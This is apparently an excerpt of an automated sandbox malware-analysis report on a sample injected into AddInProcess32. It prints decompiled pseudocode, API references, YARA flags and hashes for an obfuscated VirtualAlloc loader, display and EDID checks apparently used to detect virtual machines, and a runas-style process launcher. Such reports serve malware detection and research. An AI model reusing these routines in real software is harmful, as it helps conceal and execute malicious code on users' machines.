                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: lstrcpy$CloseOpenQuerylstrcat$EnumValue$DevicesDisplayInfo
                                              • String ID: (IsActive)$(NotActive)$--Nm:$BAD EDID!$Driver$EDID$No EDID!$\Device Parameters
                                              • API String ID: 3539320493-878170080
                                              • Opcode ID: 54d96ae3322c40133f133b92702a75b0fea06e66485431993fe1d9d7087c6a63
                                              • Instruction ID: 12465a584bf6c84ce719640fefe936f839dada52fd8ff82a576c8c8f6967ef53
                                              • Opcode Fuzzy Hash: 54d96ae3322c40133f133b92702a75b0fea06e66485431993fe1d9d7087c6a63
                                              • Instruction Fuzzy Hash: 62915C71E44328AFEB21CB60DC44FEAB7BCEF49241F0445DAA90EA6150EB749E848F11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,00008000,00001000,00000040,?,uJQWVBObOOL@#,?,dFWsQL@bGGQFPP#,?,oLBGoJAQBQZb#), ref: 0138021A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: #$#$#$#$#$#$#$#$#$#$#$#$#$#$F$F$G$M$O$O$O$Q$dFWsQL@bGGQFPP#$h$oLBGoJAQBQZb#$uJQWVBObOOL@#
                                              • API String ID: 4275171209-3179062328
                                              • Opcode ID: a667f0704a7d82f616ddd1e21fc4d9f6a3294f9a3529670c392b19acac27728d
                                              • Instruction ID: 8f26b30fb2c0545950e6913ff4e307dd33eafcba25c90c3465dccd7e36d5866d
                                              • Opcode Fuzzy Hash: a667f0704a7d82f616ddd1e21fc4d9f6a3294f9a3529670c392b19acac27728d
                                              • Instruction Fuzzy Hash: 99B1BB70D083CDDAEB05DBE8D4997EEBFB15F16308F180099D6457B282C3BA5548CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 80%
                                              			E00403CE9() {
                                              
                                              				asm("invalid");
                                              				 *0x45C60582 = 0x64;
                                              				 *0x45C60583 = 0x46;
                                              				 *0x45C60584 = 0x57;
                                              				 *0x45C60585 = 0x6e;
                                              				 *0x45C60587 = 0x47;
                                              				 *0x45C60588 = 0x56;
                                              				 *0x45C60589 = 0x4f;
                                              				 *0x45C6058A = 0x46;
                                              				asm("rol byte [esi-0x3a], 0x45");
                                              				 *0x45C6058B = 0x6b;
                                              				 *0x45C6058C = 0x42;
                                              				 *0x45C6058E = 0x4d;
                                              			}

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,dFWnLGVOFkBMGOFb#,?,uJQWVBObOOL@#,00000068), ref: 00403E61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: #$#$#$#$#$#$#$#$#$#$#$#$#$#$F$F$G$M$O$O$O$Q$dFWnLGVOFkBMGOFb#$h$uJQWVBObOOL@#
                                              • API String ID: 4275171209-2024267467
                                              • Opcode ID: 8d5d883060cc9150a05710e582697f4ca895b5f8adf5ff47d59d0031821a50da
                                              • Instruction ID: dcf4675412af51c673b628ccfd695aecf6fe8e9418b7ad345c6cd616ce72be28
                                              • Opcode Fuzzy Hash: 8d5d883060cc9150a05710e582697f4ca895b5f8adf5ff47d59d0031821a50da
                                              • Instruction Fuzzy Hash: 7B91F970D08388CEEB11CBE8D5997DDBFB1AF16308F1401A9D549AF382C3BA5985CB56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 97%
                                              			E02B533DB(void* __ebx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				short _v520;
                                              				short _v1032;
                                              				void* _v1036;
                                              				void* _v1040;
                                              				int _v1044;
                                              				int _v1048;
                                              				int _v1052;
                                              				int _v1056;
                                              				int _v1060;
                                              				int _v1064;
                                              				signed int _t31;
                                              				long _t34;
                                              				long _t55;
                                              				long _t61;
                                              				void* _t64;
                                              				void* _t71;
                                              				int _t74;
                                              				signed int _t75;
                                              
                                              				_t71 = __edi;
                                              				_t64 = __ebx;
                                              				_t31 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t31 ^ _t75;
                                              				_t34 = RegOpenKeyExW(0x80000002, L"SYSTEM\\ControlSet001\\Enum\\DISPLAY", 0, 9,  &_v1036); // executed
                                              				if(_t34 != 0) {
                                              					L10:
                                              					return E02B53C33(_v8 ^ _t75);
                                              				}
                                              				if(RegQueryInfoKeyW(_v1036, 0, 0, 0,  &_v1044,  &_v1060, 0,  &_v1056,  &_v1052,  &_v1048, 0, 0) != 0) {
                                              					L9:
                                              					RegCloseKey(_v1036);
                                              					goto L10;
                                              				} else {
                                              					_t74 = _v1044;
                                              					while(1) {
                                              						_t74 = _t74 - 1;
                                              						if(_t74 < 0) {
                                              							goto L9;
                                              						}
                                              						_v1032 = 0;
                                              						RegEnumKeyW(_v1036, _t74,  &_v1032, 0x100); // executed
                                              						_v520 = 0;
                                              						E02B52C9C( &_v520, L"SYSTEM\\ControlSet001\\Enum\\DISPLAY");
                                              						StrCatW( &_v520, "\\");
                                              						StrCatW( &_v520,  &_v1032);
                                              						_t55 = RegOpenKeyExW(0x80000002,  &_v520, 0, 9,  &_v1040); // executed
                                              						if(_t55 == 0) {
                                              							_t61 = RegQueryInfoKeyW(_v1040, 0, 0, 0,  &_v1064,  &_v1060, 0,  &_v1056,  &_v1052,  &_v1048, 0, 0);
                                              							if(_t61 == 0) {
                                              								if(_v1064 != _t61) {
                                              									E02B5308A(_t64,  &_v520, _t71, _t74); // executed
                                              								}
                                              								RegCloseKey(_v1040);
                                              							}
                                              						}
                                              					}
                                              					goto L9;
                                              				}
                                              			}
                                              (Per-line instruction addresses for the listing above, 0x02b533db to 0x02b5355a; the address column was separated from the code lines during extraction.)

                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\ControlSet001\Enum\DISPLAY,00000000,00000009,?), ref: 02B53405
                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B53442
                                              • RegEnumKeyW.ADVAPI32(?,?,?,00000100), ref: 02B53477
                                              • StrCatW.SHLWAPI(?,02B54480), ref: 02B534A2
                                              • StrCatW.SHLWAPI(?,?), ref: 02B534B6
                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?), ref: 02B534D3
                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B5350E
                                              • RegCloseKey.ADVAPI32(?), ref: 02B53531
                                              • RegCloseKey.ADVAPI32(?), ref: 02B53546
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CloseInfoOpenQuery$Enum
                                              • String ID: SYSTEM\ControlSet001\Enum\DISPLAY
                                              • API String ID: 938792220-4245451955
                                              • Opcode ID: ada36984a414456eb4f95f64f14468dfa1f342e4c40e7b411c3d41fd9bd7b0b8
                                              • Instruction ID: 51ebdb338656fd409632222aec1f878416bda2637916f028697a32fd308e9bcb
                                              • Opcode Fuzzy Hash: ada36984a414456eb4f95f64f14468dfa1f342e4c40e7b411c3d41fd9bd7b0b8
                                              • Instruction Fuzzy Hash: AE41ECB294023CAADB219B60DD49FEBB7BCEF04240F4445E5BB09E6111EB309AD58F64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 82%
                                              			_entry_(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                              				struct _FILETIME _v12;
                                              				_Unknown_base(*)()* _t5;
                                              				void* _t13;
                                              
                                              				_t5 = GetProcAddress(LoadLibraryA("ntdll"), "RtlRandomEx");
                                              				 *0x2b5947c = _t5;
                                              				_t21 = _t5;
                                              				if(_t5 != 0) {
                                              					GetSystemTimeAsFileTime( &_v12);
                                              					asm("adc eax, 0xfe624e21");
                                              					 *0x2b59478 = E02B53E90(_v12.dwLowDateTime + 0x2ac18000, _v12.dwHighDateTime, 0x989680, 0); // executed
                                              					_t13 = E02B5372C(__edi, __esi, _t21); // executed
                                              					if(_t13 == 0) {
                                              						E02B5138F(__ebx, __edi, __esi);
                                              					}
                                              				}
                                              				TerminateProcess(GetCurrentProcess(), 0); // executed
                                              				return 1;
                                              			}
                                              (Per-line instruction addresses for the listing above, 0x02b51475 to 0x02b514d5; the address column was separated from the code lines during extraction.)

                                              APIs
                                              • LoadLibraryA.KERNEL32(ntdll,RtlRandomEx), ref: 02B5146E
                                              • GetProcAddress.KERNEL32(00000000), ref: 02B51475
                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 02B51488
                                              • __aulldiv.LIBCMT ref: 02B514A8
                                                • Part of subcall function 02B5138F: GetModuleHandleA.KERNEL32(00000000), ref: 02B513B1
                                                • Part of subcall function 02B5138F: VirtualQuery.KERNEL32(00000000,?,00001000), ref: 02B513C6
                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02B514C2
                                              • TerminateProcess.KERNELBASE(00000000), ref: 02B514C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ProcessTime$AddressCurrentFileHandleLibraryLoadModuleProcQuerySystemTerminateVirtual__aulldiv
                                              • String ID: RtlRandomEx$ntdll$Nqt
                                              • API String ID: 491243650-2249084123
                                              • Opcode ID: 8db0a9dd6af13a53eee8f2e293350d40a5596e0dc37122c688ebc00219d0ab0f
                                              • Instruction ID: fd3bc3ee58b7b887c60e0f3cdf4cfb045be20461a978b0e161e5f634aed4bb69
                                              • Opcode Fuzzy Hash: 8db0a9dd6af13a53eee8f2e293350d40a5596e0dc37122c688ebc00219d0ab0f
                                              • Instruction Fuzzy Hash: 1AF04475D94328ABD610AFB49C49B6A37BCDF04289F180894B906DB240EA74D4508F20
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 188 2b52fd4-2b53013 189 2b5306a-2b5306e EnumDisplayDevicesA 188->189 190 2b53015-2b53041 call 2b52ce7 EnumDisplayDevicesA 189->190 191 2b53070-2b53084 call 2b53c33 189->191 196 2b53056-2b53068 GetLastError 190->196 197 2b53043-2b53054 StrStrA 190->197 196->189 197->196 198 2b53085-2b53088 197->198 198->191
                                              C-Code - Quality: 21%
                                              			E02B52FD4(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				char _v432;
                                              				long _v436;
                                              				struct _DISPLAY_DEVICEA _v860;
                                              				signed int _t11;
                                              				char* _t22;
                                              				char* _t27;
                                              				void* _t39;
                                              				signed int _t41;
                                              
                                              				_t43 = (_t41 & 0xfffffff8) - 0x35c;
                                              				_t11 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t11 ^ (_t41 & 0xfffffff8) - 0x0000035c;
                                              				_t27 = __ecx;
                                              				_v436 = 0x1a8;
                                              				_push(0);
                                              				_push( &_v436);
                                              				_push(0);
                                              				_t39 = 0;
                                              				_push(0);
                                              				while(EnumDisplayDevicesA() != 0) {
                                              					E02B52CE7(_t14,  &_v860, 0x1a8);
                                              					_v860.cb = 0x1a8;
                                              					if(EnumDisplayDevicesA( &_v432, 0,  &_v860, 0) == 0) {
                                              						L3:
                                              						GetLastError();
                                              						_push(0);
                                              						_t39 = _t39 + 1;
                                              						_push( &_v436);
                                              						_push(_t39);
                                              						_push(0);
                                              						continue;
                                              					} else {
                                              						_t22 = StrStrA( &(_v860.DeviceID), _t27); // executed
                                              						if(_t22 == 0) {
                                              							goto L3;
                                              						}
                                              					}
                                              					break;
                                              				}
                                              				return E02B53C33(_v12 ^ _t43);
                                              			}
                                              (Per-line instruction addresses for the listing above, 0x02b52fda to 0x02b53084; the address column was separated from the code lines during extraction.)

                                              APIs
                                              • EnumDisplayDevicesA.USER32(?,00000000,?,00000000), ref: 02B5303D
                                              • StrStrA.KERNELBASE(?,?), ref: 02B5304C
                                              • GetLastError.KERNEL32 ref: 02B53056
                                              • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 02B5306A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: DevicesDisplayEnum$ErrorLast
                                              • String ID:
                                              • API String ID: 2855626068-0
                                              • Opcode ID: e8445ef92b0d0f6d22d70e45a758134cc488de82347c465936d899295f94b6dd
                                              • Instruction ID: 3360150db0bf5159a6aecf5797f8acb0d88d5e8f114bed5db27d0a6bb54e9a68
                                              • Opcode Fuzzy Hash: e8445ef92b0d0f6d22d70e45a758134cc488de82347c465936d899295f94b6dd
                                              • Instruction Fuzzy Hash: 4F11CE71A58354ABE3609B64DC45FEB73ECEF84791F04096DA949CA180EB70A904CAA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 199 1380570-13805eb 200 13805f2-13805fb 199->200 201 13806e8-13806f0 200->201 202 1380601-1380615 call 1380500 200->202 205 138061b-1380630 202->205 206 13806e1 202->206 207 1380633-1380639 205->207 206->201 208 138063f-1380651 207->208 209 13806c4-13806e3 207->209 211 1380683-13806a6 LoadLibraryA 208->211 212 1380653-1380681 208->212 209->200 213 13806ab 211->213 215 13806ae-13806bf 212->215 213->215 215->207
                                              APIs
                                              • LoadLibraryA.KERNELBASE(00000000,00000000,?,?,?,?,00000000), ref: 013806A0
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: e937006d0eac38888625c5fba067e9f893380eca7e5b8aa9e88496690ea0c380
                                              • Instruction ID: 29651db6f21e1dc7e5a824a02163724dd5bb7c1d46e4515f6b3a7b63ffcef279
                                              • Opcode Fuzzy Hash: e937006d0eac38888625c5fba067e9f893380eca7e5b8aa9e88496690ea0c380
                                              • Instruction Fuzzy Hash: 055180B4E00209EFDB48DF98D890BADBBB5FF48318F14815AE919A7351D730A945CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 217 1380700-1380762 VirtualAlloc 218 138076b-1380774 217->218 219 1380764-1380766 217->219 221 1380777-1380780 218->221 220 1380868-138086e 219->220 222 138079d-13807b7 221->222 223 1380782-138079b 221->223 224 13807c2-13807cc 222->224 223->221 225 13807ce-13807f0 224->225 226 1380824-138084f call 1380870 call 1380570 224->226 228 13807f3-13807fc 225->228 234 1380854-1380865 226->234 230 1380819-1380822 228->230 231 13807fe-1380817 228->231 230->224 231->228 234->220
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,013809F4,00001000,00000040), ref: 01380759
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: b02edd85b4b2e0ba4da0d4ead806a640de917280d28bcf58c2f3eec5a6372bc3
                                              • Instruction ID: 7605dafe9dce02513b7ad03750b69aba366e3239da7ce84bd9beab4616c8ac60
                                              • Opcode Fuzzy Hash: b02edd85b4b2e0ba4da0d4ead806a640de917280d28bcf58c2f3eec5a6372bc3
                                              • Instruction Fuzzy Hash: C9516DB4E00209EFCB08DF98D591AEDBBB5BF48318F144099E915AB351D731AA94CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 245 402050-402143 call 409280 * 5 call 401800 258 402881-402925 LoadIconW * 2 LoadCursorW RegisterClassExW CreateDialogParamW GetMessageW 245->258 259 402149-402167 call 40346a 245->259 261 402927-402935 IsDialogMessageW 258->261 262 40295e 258->262 259->258 267 40216d-40217f call 40346a 259->267 264 402937-402947 TranslateMessage DispatchMessageW 261->264 265 40294d-40295c GetMessageW 261->265 266 402966-402989 LocalFree call 40318a 262->266 264->265 265->261 265->262 272 402185-40218c 267->272 273 40227f-402291 call 40346a 267->273 275 4023a1-4023d1 call 4036e5 call 4029c0 272->275 276 402192-4021a9 call 40346a 272->276 280 4022d0-4022e2 call 40346a 273->280 281 402293-402296 273->281 295 4023d3-4023e1 call 401880 275->295 296 4023e6-40240e call 402f60 275->296 287 4021ab-4021b8 SetEnvironmentVariableW 276->287 288 4021be-4021c0 276->288 297 402321-402333 call 40346a 280->297 298 4022e4-4022e7 280->298 285 4022b3 281->285 286 402298-4022b1 call 40346a 281->286 292 4022b7-4022cb call 401ba0 285->292 286->285 286->292 287->288 288->275 293 4021c6-40226a call 409280 call 4036e5 call 40366b CreateProcessW 288->293 292->266 293->266 333 402270-40227a GetLastError 293->333 295->266 296->266 317 402414-40248e call 409280 * 3 call 402cb0 296->317 319 402370-402382 call 40346a 297->319 320 402335-402338 297->320 303 402304 298->303 304 4022e9-402302 call 40346a 298->304 312 402308-40231c call 401ba0 303->312 304->303 304->312 312->266 317->266 345 402494-4024f6 CreateProcessWithLogonW 317->345 319->275 335 402384-40238c 319->335 325 402355 320->325 326 40233a-402353 call 40346a 320->326 328 402359-40236b call 401930 325->328 326->325 326->328 328->266 333->266 338 40239e 335->338 339 40238e-40239a 335->339 338->275 339->338 346 402504-402506 345->346 347 4024f8-402502 GetLastError 345->347 348 40254b-402553 346->348 349 402508-402531 call 403926 call 40360d 346->349 347->348 348->317 351 402559-402561 
348->351 349->348 358 402533-402545 EnumWindows 349->358 351->317 353 402567-40256f 351->353 353->317 355 402575-40257d 353->355 355->317 357 402583-402588 355->357 357->317 359 40258e-402596 357->359 358->348 360 402835-40283f 358->360 359->317 361 40259c-4025a4 359->361 362 402840-402845 360->362 361->317 363 4025aa-4025b2 361->363 365 402847-40284e 362->365 366 402868-40287c CloseHandle * 2 362->366 363->317 364 4025b8-4025bd 363->364 364->317 367 4025c3-4025cb 364->367 365->366 368 402850-402866 Sleep EnumWindows 365->368 366->266 367->317 369 4025d1-4025d9 367->369 368->362 368->366 369->317 370 4025df-4025e7 369->370 370->317 371 4025ed-4025f5 370->371 371->317 372 4025fb-402603 371->372 372->317 373 402609-402611 372->373 373->317 374 402617-40261f 373->374 374->317 375 402625-40262d 374->375 375->317 376 402633-40263b 375->376 376->317 377 402641-402649 376->377 377->317 378 40264f-402657 377->378 378->317 379 40265d-402665 378->379 379->317 380 40266b-402673 379->380 380->317 381 402679-402681 380->381 381->317 382 402687-40268f 381->382 382->317 383 402695-40269d 382->383 383->317 384 4026a3-4026ab 383->384 384->317 385 4026b1-4026b9 384->385 385->317 386 4026bf-4026c7 385->386 386->317 387 4026cd-4026d5 386->387 387->317 388 4026db-4026e3 387->388 388->317 389 4026e9-4026f1 388->389 389->317 390 4026f7-4026ff 389->390 390->317 391 402705-40270d 390->391 391->317 392 402713-40271b 391->392 392->317 393 402721-402729 392->393 393->317 394 40272f-402737 393->394 394->317 395 40273d-402745 394->395 395->317 396 40274b-402753 395->396 396->317 397 402759-402761 396->397 397->317 398 402767-40276f 397->398 398->317 399 402775-40277d 398->399 399->317 400 402783-40278b 399->400 400->317 401 402791-402799 400->401 401->317 402 40279f-4027a7 401->402 402->317 403 4027ad-4027b5 402->403 403->317 404 4027bb-4027c3 403->404 404->317 405 4027c9-4027d1 404->405 405->317 406 4027d7-4027df 405->406 406->317 407 4027e5-4027ed 406->407 407->317 408 4027f3-4027fb 407->408 
408->317 409 402801-402809 408->409 409->317 410 40280f-402818 409->410 410->317 411 40281e-402820 410->411 411->366 412 402822-402830 call 401880 411->412 412->266
                                              C-Code - Quality: 75%
                                              			E00402050(struct HINSTANCE__* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				short _v1052;
                                              				char _v2082;
                                              				char _v2084;
                                              				char _v2762;
                                              				char _v2764;
                                              				char _v3282;
                                              				char _v3284;
                                              				char _v3802;
                                              				char _v3804;
                                              				struct _STARTUPINFOW _v3876;
                                              				short _v3900;
                                              				short _v3904;
                                              				char _v3944;
                                              				struct HWND__* _v3948;
                                              				struct _WNDCLASSEXW _v4024;
                                              				struct _PROCESS_INFORMATION _v4040;
                                              				struct HWND__* _v4044;
                                              				intOrPtr _v4048;
                                              				intOrPtr _v4052;
                                              				intOrPtr _v4056;
                                              				char _v4060;
                                              				void* _v4064;
                                              				char _v4068;
                                              				void* _v4072;
                                              				char _v4073;
                                              				intOrPtr _v4080;
                                              				void* _v4081;
                                              				struct HWND__* _v4088;
                                              				intOrPtr _v4092;
                                              				void* _v4096;
                                              				void* _v4100;
                                              				void* _v4104;
                                              				void* _v4132;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t183;
                                              				void* _t193;
                                              				void* _t199;
                                              				intOrPtr _t201;
                                              				void* _t203;
                                              				void* _t205;
                                              				void* _t208;
                                              				void* _t210;
                                              				void* _t211;
                                              				void* _t213;
                                              				void* _t214;
                                              				void* _t215;
                                              				void* _t218;
                                              				void* _t220;
                                              				void* _t227;
                                              				void* _t229;
                                              				void* _t230;
                                              				void* _t237;
                                              				void* _t238;
                                              				intOrPtr _t239;
                                              				int _t240;
                                              				short _t244;
                                              				struct HWND__* _t245;
                                              				void* _t247;
                                              				signed int _t248;
                                              				struct HWND__* _t251;
                                              				void* _t252;
                                              				short _t253;
                                              				struct HWND__* _t255;
                                              				void* _t257;
                                              				void* _t258;
                                              				void* _t272;
                                              				void* _t274;
                                              				void* _t275;
                                              				intOrPtr _t333;
                                              				void* _t339;
                                              				intOrPtr _t340;
                                              				struct HINSTANCE__* _t344;
                                              				struct HWND__* _t345;
                                              				void* _t346;
                                              				void* _t352;
                                              				signed int _t353;
                                              				signed int _t354;
                                              				signed int _t356;
                                              				signed int _t361;
                                              				void* _t362;
                                              				void* _t363;
                                              				void* _t364;
                                              				void* _t365;
                                              				void* _t367;
                                              
                                              				_t356 = (_t354 & 0xfffffff8) - 0xff4;
                                              				_t183 =  *0x413004; // 0x98fc836b
                                              				_v8 = _t183 ^ _t356;
                                              				_t333 = __edx;
                                              				_t344 = __ecx;
                                              				_v4080 = __edx;
                                              				_v4088 = 0;
                                              				_v2764 = 0;
                                              				E00409280(__edx,  &_v2762, 0, 0x2a2);
                                              				_v2084 = 0;
                                              				E00409280(_t333,  &_v2082, 0, 0x402);
                                              				_v3284 = 0;
                                              				E00409280(_t333,  &_v3282, 0, 0x200);
                                              				_v3804 = 0;
                                              				E00409280(_t333,  &_v3802, 0, 0x206);
                                              				_v3948 = 0;
                                              				E00409280(_t333,  &_v3944, 0, 0x40);
                                              				_v4060 = 0;
                                              				_v4068 = 0;
                                              				_v4044 = 0;
                                              				_v4072 = 0;
                                              				_v4081 = 0;
                                              				_v4073 = 0;
                                              				_t361 = _t356 + 0x3c;
                                              				_v4056 = 0;
                                              				_v4052 = 0;
                                              				_v4048 = 0;
                                              				_t193 = E00401800(_t333,  &_a4, _t344);
                                              				_t272 = _a4;
                                              				if(_t272 < 2) {
                                              					L96:
                                              					_v4024.cbSize = 0x30;
                                              					_v4024.style = 3;
                                              					_v4024.lpfnWndProc = E00401D50;
                                              					_v4024.cbClsExtra = 0;
                                              					_v4024.cbWndExtra = 0x1e;
                                              					_v4024.hInstance = _t344;
                                              					_v4024.hIcon = LoadIconW(_t344, L"ICON");
                                              					_v4024.hIconSm.hwnd = LoadIconW(_t344, L"ICON");
                                              					_v4024.hCursor = LoadCursorW(0, 0x7f00);
                                              					_v4024.hbrBackground = 0x10;
                                              					_v4024.lpszMenuName = 0;
                                              					_v4024.lpszClassName = L"SHELLRUNAS";
                                              					RegisterClassExW( &_v4024);
                                              					_t345 = CreateDialogParamW(_t344, L"AboutUsage", 0, E00401D50, 0);
                                              					_t199 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
                                              					__eflags = _t199;
                                              					if(_t199 == 0) {
                                              						L100:
                                              						_v4092 = 0x57;
                                              						L101:
                                              						LocalFree(_v4072);
                                              						_t201 = _v4092;
                                              						_pop(_t346);
                                              						_pop(_t274);
                                              						E0040318A(_t201, _t274, _v12 ^ _t361, _t346);
                                              						return _t201;
                                              					} else {
                                              						goto L97;
                                              					}
                                              					do {
                                              						L97:
                                              						_t203 = IsDialogMessageW(_t345,  &(_v4024.hIconSm));
                                              						__eflags = _t203;
                                              						if(_t203 == 0) {
                                              							TranslateMessage( &(_v4024.hIconSm));
                                              							DispatchMessageW( &(_v4024.hIconSm));
                                              						}
                                              						_t205 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
                                              						__eflags = _t205;
                                              					} while (_t205 != 0);
                                              					goto L100;
                                              				}
                                              				_t339 = _v4080 + 4;
                                              				_v4064 = _t339;
                                              				_t208 = E0040346A(_t193,  *(_v4080 + 4), L"/?");
                                              				_t361 = _t361 + 8;
                                              				if(_t208 == 0) {
                                              					goto L96;
                                              				}
                                              				_t210 = E0040346A( *_t339,  *_t339, L"/raw");
                                              				_t362 = _t361 + 8;
                                              				if(_t210 != 0) {
                                              					_t312 =  *_t339;
                                              					_t211 = E0040346A(_t210,  *_t339, L"/reg");
                                              					_t363 = _t362 + 8;
                                              					__eflags = _t211;
                                              					if(_t211 != 0) {
                                              						_t213 = E0040346A( *_t339,  *_t339, L"/regnetonly");
                                              						_t364 = _t363 + 8;
                                              						__eflags = _t213;
                                              						if(_t213 != 0) {
                                              							_t285 =  *_t339;
                                              							_t214 = E0040346A(_t213,  *_t339, L"/unreg");
                                              							_t365 = _t364 + 8;
                                              							__eflags = _t214;
                                              							if(_t214 != 0) {
                                              								_t215 = E0040346A(_t214,  *_t339, L"/netonly");
                                              								_t362 = _t365 + 8;
                                              								__eflags = _t215;
                                              								if(_t215 == 0) {
                                              									__eflags = _t272 - 2;
                                              									_v4072 = 1;
                                              									if(_t272 > 2) {
                                              										_t352 = _v4080 + 8;
                                              										__eflags = _t352;
                                              										memcpy(_t339, _t352, _t272 - 2 << 2);
                                              										_t362 = _t362 + 0xc;
                                              										_t339 = _v4064;
                                              									}
                                              									__eflags = _t272;
                                              								}
                                              								L28:
                                              								E004036E5( *_t339,  &_v3804, 0x104,  *_t339);
                                              								_t218 = E004029C0( *_t339, __eflags,  &_v3804);
                                              								_t367 = _t362 + 0x10;
                                              								__eflags = _t218;
                                              								_v4088 = _t218;
                                              								if(__eflags == 0) {
                                              									_push( &_v4068);
                                              									_push(_v4072);
                                              									_push(_v4080);
                                              									_t220 = E00402F60(_t272,  &_v4073,  &_v3804, __eflags);
                                              									_t361 = _t367 + 0xc;
                                              									__eflags = _t220;
                                              									_v4088 = _t220;
                                              									if(_t220 != 0) {
                                              										goto L101;
                                              									} else {
                                              										goto L31;
                                              									}
                                              									while(1) {
                                              										L31:
                                              										E00409280(_t339,  &_v2084, 0, 0x202);
                                              										E00409280(_t339,  &_v2764, 0, 0x152);
                                              										E00409280(_t339,  &_v3284, 0, 0x101);
                                              										_push(_v4088);
                                              										_push( &_v3284);
                                              										_push( &_v2084);
                                              										_push(_v4072);
                                              										_t339 =  &_v2764;
                                              										_t227 = E00402CB0( *_v4064, _t339, __eflags);
                                              										_t361 = _t361 + 0x34;
